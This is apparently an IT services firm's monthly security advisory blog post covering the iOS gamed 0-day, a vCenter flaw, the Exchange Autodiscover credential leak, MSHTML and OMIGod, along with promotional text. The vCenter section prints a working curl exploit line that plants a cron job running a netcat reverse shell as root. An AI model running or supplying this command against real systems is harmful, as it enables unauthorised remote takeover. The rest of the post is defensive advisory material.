September '21 in Review - Vulnerabilities, Exploits and Zero Days

Hello everyone.

September '21 had a lot going on in the land of Cybersecurity - seeing the release of 3 major vulnerabilities and exploit Proof Of Concepts (POCs) for Apple IOS (iPhone), Exchange Autodiscover, and VMWare vCenter Bad Packet. We'll go into some depth of these exploits, but I would like to first make an announcement.

Subnet has launched our 24x7 support for all our clients!!!

Our team is now working around the clock to keep you safe, and your tickets moving. We are pleased to announce that our 24x7 offering is now available for all clients that call the support desk line and will receive the same high-level support that you've grown to expect from us over the last 2 decades. The 24x7 team are all Subnet employees, so rest assured you're dealing with the same people and team you know and love!

Apple iOS

The Apple IOS vulnerability which attracted a bug bounty of $100,000 affects the latest version of iOS, and as yet does not have any patch for it. If you're using a rooted device, some of those developers have released patch for - but being that these are not recommended configurations we will not list them here - uncle Google may help though!

The Gamed 0-Day identified that any app installed from the app store may access the following data without prompt from the user:

Apple ID email and full name associated with it
Apple authentication token, which grants access to *.apple.com on behalf of the user
Complete file system read access to the Core Duet database which contains all contacts from Mail, SMS, iMessage, 3rd-party messaging apps and metadata about all user's interaction with these contacts, including timestamps and attachments.
Complete file system read access to the Speed Dial database and the Address Book database including contact pictures and other metadata like creation and modification data.

Source: illusionofchaos GitHub page

This can occur even if the gamecenter is disabled allowing arbitrary read of tiles outside of the application sandbox. There is a possibility that this will allow write of files to the system as well. This was all published on GitHub 5 days ago by IllusionOfChaos research team after Apple didn't acknowledge the problem(s) for upward of 6 months. At this stage there is not a means for mitigation (beyond using a rooted device patch, which introduces other risks).

VMWare vCenter

The recent 9.8 vCenter vulnerability allows a user to make a simple web request to the web console of the vCenter and based on that, grants the ability to create a command-line access with persistence on the device. Subnet have requested changes with all of our managed clients and pushed the patch through at the scheduled time. However, the Proof of Concept for the exploit has been released today. Our team have tested the proof of concept and have been able to gain privileged access to a system and deploy a scheduled tasks to grant persistent access on the systems affected. This exploit POC is available online, and the Linux command to test if it works is very short:

curl -kv "https://<VCIP>/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh <LISTENING IP> <LISTENING PORT>"

Please reach out to Subnet for assistance in patching your vCenter appliance ASAP as the ACSC has released information that they're seeing this actively exploited in the wild, and so the update must be patched ASAP.

Microsoft Exchange Autodiscovering the Great Leak

As mentioned in a previous LinkedIn post, Subnet were made aware of a leak of credentials by a downgrade of authentication using the autodiscover protocol as associated with the email address used. How this works is when you enter your email address into Outlook on first set up, is that it sends your information to your local device and configures it. If the server doesn't respond in a timely manner, the protocol grabs your domain name, eg. Subnet.net.au and elevates to autodicover.net.au (using the Top Level Domain e.g. .net.au) to tries and find the information. By itself is not fantastic, but further than this, when you send your credentials over the internet to these domains it can then suggest to the client that it can't read the token, at which point the Outlook client sends the credentials of the user back in plain text. This is proven to be happening across several Top-Level Domains including, .com.au, .co.br, .org etc. Microsoft have since gone and registered most autodiscover.* TLDs but there are a handful that are registered to organisations or individuals with privacy settings on their whois information. It is unclear who own these domains.

Subnet have spent some time investigating the exploit, and without clear guidance being readily available from Microsoft have determined that blocking the autodiscover.* top level domains is the best course of action in this instance. This won't protect clients that are working remotely or at home, so there is still some risk of credential exposure. Further to this, basic authentication needs to be disabled on exchange servers, and insecure authentication methods need to be further restricted. This may have impact to services such as scan-to-email and other similar functions. Subnet are actively working with the team to build acceptable change control that addresses the leak.

Microsoft MSHTML Remote Code Execution in Office / Internet Explorer

Subnet were made aware of the vulnerability in Office, that arranges for a special document to make a call to Internet Explorer and based on execution of the html file can load a malicious webshell (.aspx) file and enable remote takeover of the affected machine. Subnet, early in September, had moved to disable ASPX via registry settings, and subsequently Microsoft has patched the issue. ACSC has released information that they're seeing this actively exploited in the wild, and so swift action taken by Subnet to mitigate the vulnerability has kept our clients safe.

Microsoft OMIGod Linux / Azure Automation vulnerability

Microsoft had a vulnerability for a non-disclosed installation of a service that was used by Azure hosted servers, and for any Azure / Microsoft managed patching. The service allows unauthenticated access to your systems and enables the ability to remotely take over the device. Interesting in and of itself, however the non-disclosed service is also not able to be updated by Microsoft, forcing their clients and IT teams around the world to scramble to update a service they didn't know about. In testing this vulnerability it is a simple web request again that without an authentication header is never actually declined, and so sets the user ID to 0 (Root) and grants full control of the system responding to it. A simple fix to address, however in some instances the service required a specific version to be downloaded from github. The Youtube videos I posted on LinkedIn talk about how to exploit the vulnerability, and the subsequent post talks about how to detect exploit of the vulnerability.

Closing statement

And that is going to cover it for this month (next 36 hours being kind).

I want to thank the team at Subnet for their diligence in discovering and actioning these threats. The care and urgency that goes into these threats are phenomenal and the great support and peace of mind that comes to our clients for actioning these alerts to that high-level as dictated by Essential 8 Maturity 3 is so very important to client security in this evolving landscape of cyber-crime.

I would like to encourage organisations to reach out to Subnet for our Security Maturity Journey and to work through what a Security Assessment, and +Security Managed Service looks like for your company. We address the Essential 8 in our offering and actively work with you and your team to ensure greater security, and build towards that layered defense-in-depth strategy.

Stay Safe!

Mat C

.